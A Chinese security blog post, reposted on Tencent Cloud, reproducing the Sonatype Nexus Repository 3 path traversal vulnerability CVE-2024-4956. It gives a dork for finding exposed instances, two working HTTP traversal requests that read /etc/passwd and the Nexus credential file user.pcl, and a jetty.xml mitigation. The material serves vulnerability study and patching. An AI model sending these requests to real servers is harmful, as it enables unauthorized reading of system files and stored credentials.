首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >漏洞复现| Nexus Reposity3目录穿越漏洞-CVE-2024-4956

漏洞复现| Nexus Reposity3目录穿越漏洞-CVE-2024-4956

作者头像
OneTS安全团队
发布2025-02-07 16:28:43
发布2025-02-07 16:28:43
9640
举报
文章被收录于专栏:OneTS安全团队OneTS安全团队

声明

本文属于OneTS安全团队成员98的原创文章,转载请声明出处!本文章仅用于学习交流使用,因利用此文信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,OneTS安全团队及文章作者不为此承担任何责任。

Nexus Reposity3介绍

Sonatype Nexus Repository 3(Sonatype Nexus 3)是一个由Sonatype开发的仓库管理工具,用于管理和托管各种软件构件(如Maven构件、Docker镜像等)。它提供了一种集中化的方式来存储、管理和分发软件构件,以帮助团队协作和构建自动化。

漏洞描述

Sonatype Nexus Repository 3 存在路径遍历漏洞(CVE-2024-4956),未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议尽快做好自查及防护。

目前笔者已发现某SRC存在该漏洞且审核通过

漏洞影响版本

Sonatype Nexus Repository 3 < 3.68.1

资产测绘平台Dork

代码语言:javascript
复制
title="Nexus"

漏洞复现

漏洞exp

代码语言:javascript
复制
GET /.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd HTTP/1.1
Host: ip:port

读取密码

代码语言:javascript
复制
GET /.%2f/..%2f/..%2f/..%2f/..%2f/nexus-data/db/security/user.pcl HTTP/1.1
Host: ip:port

漏洞修复建议

无法立即升级的Sonatype Nexus Repository实例,可通过编辑/etc/jetty/jetty.xml 并删除文件中的以下行来缓解该漏洞:

代码语言:javascript
复制
<Set name="resourceBase"><Property name="karaf.base"/>/public</Set>

重启 Nexus Repository,使更改生效。

注:此更改可防止漏洞被利用,但也会阻止应用程序从/public 目录加载文件,这可能会导致某些UI 渲染问题,但不会影响核心产品功能。升级到修复版本后的实例无需删除该行。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-05-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 OneTS安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档